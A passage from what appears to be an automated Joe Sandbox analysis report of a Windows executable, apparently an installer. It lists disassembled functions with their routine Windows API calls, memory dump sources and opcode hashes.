                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 781191307043205AEE20FA64AD41B9B73D4DFD1708F80481EF9D997382D77D9E49879A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004014E4 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 37memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                                                                                                                  • String ID: |2h
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2087232378-213120317
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0047EC14 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0047EDE1,?,?,00000001,00000000), ref: 0047EC4A
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • /SPAWNWND=$%x /NOTIFYWND=$%x , xrefs: 0047ECB5
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window
                                                                                                                                                                                                                                                                                                                                                                  • String ID: /SPAWNWND=$%x /NOTIFYWND=$%x
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2353593579-560813925
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ae61550f504763cf218c3e2ecc02052625be6b1c1a3f3a572833970bf44392c3
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b5665820ffd1b45baca6a1f3cc7b68665085fe19fe65d74f16aceae6615345ff
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae61550f504763cf218c3e2ecc02052625be6b1c1a3f3a572833970bf44392c3
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA31A274A04349AFDB01CFA9C895EDEBFF8EB0D314F4184A6E504A7352D739A940CB69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0047DF80 Relevance: 3.2, APIs: 2, Instructions: 160windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,00000001,00000000,0047E25F,?,-0000001A,004800D8,-00000010,?,00000004,0000001B,00000000,00480425,?,0045DECC), ref: 0047DFF6
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042E32C: 73E9A570.USER32(00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB), ref: 0042E33B
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042E32C: EnumFontsA.GDI32(?,00000000,0042E318,00000000,00000000,0042E384,?,00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000), ref: 0042E366
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042E32C: 73E9A480.USER32(00000000,?,0042E38B,00000000,00000000,0042E384,?,00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000), ref: 0042E37E
                                                                                                                                                                                                                                                                                                                                                                  • SendNotifyMessageA.USER32(000D023E,00000496,00002711,-00000001), ref: 0047E1C6
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: A480A570EnumFontsMessageNotifySend
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2685184028-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d5a98fd350b21412a22cf4123539bd0c298e95acb479fbe192b8033f652af546
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0ea8e5e95b90053dcc80dc26f94e29a170662e2b3e10ca2db4d961c35622b213
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d5a98fd350b21412a22cf4123539bd0c298e95acb479fbe192b8033f652af546
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2651A6746001508BD710FF27D9C16963799EB88308B90C6BBA8089F367C77CDD068B9D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040170C Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,00401973), ref: 00401766
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID: |2h
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1263568516-213120317
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042324C Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00423259
                                                                                                                                                                                                                                                                                                                                                                  • LoadCursorA.USER32(00000000,00000000), ref: 00423283
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CursorLoad
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3238433803-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c8375b04fab070422f53c3d6524130e38f027298e82d6ab835706982cf041ecc
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FF0A711704114AADA105D7E6CC0E2B7268DB91B36B6103BBFA3AD72D1C62E1D41457D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042E3A4 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLibraryLoadMode
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2987862817-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4c631be622775e629d3517db74bab1fded93a1e132453b83b18733572cca4853
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 98bcbcc3e9aaf4c66058534b39987ccdd7eb12bd14468eaf88ad72af9e5505e3
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c631be622775e629d3517db74bab1fded93a1e132453b83b18733572cca4853
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5F05E70A14744BEDF119F779C6282ABAACE749B1179248B6F810A3691E67D48108928
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004085E4 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1658689577-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2ab4847006ef9acfce6ccb5f1f64a91e8b74d27154e4f0e7901e4566ca639e1f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ea6634d2ed8774f5e90a5a6f355d63bed973dafba18e0ec7d48b30ffe24ea089
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ab4847006ef9acfce6ccb5f1f64a91e8b74d27154e4f0e7901e4566ca639e1f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4314375E001199BCF01DF95C8819EEB7B9FF84314F15857BE815AB286E738AE018B98
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004507B0 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004507F0
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0d6e8dd0d05b5784dbdcfa3146256ffc4dbe9b1a284e4e7eb3306544c838df4f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d6e8dd0d05b5784dbdcfa3146256ffc4dbe9b1a284e4e7eb3306544c838df4f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042E8D8 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FormatMessage
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1306739567-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1d16c149c237ab05d394d1dcd15bc1a2ba242a73302d35381885c392630e106f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1e04b5e42f682bd3307758a00633d1e15c64123c11c882a5e2d093d9edca25ee
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d16c149c237ab05d394d1dcd15bc1a2ba242a73302d35381885c392630e106f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7E0D86178432126F23524166C43B7B110E43C0704FD080267A809F3D6D6EE9949425E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00406300 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042365C Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D
                                                                                                                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
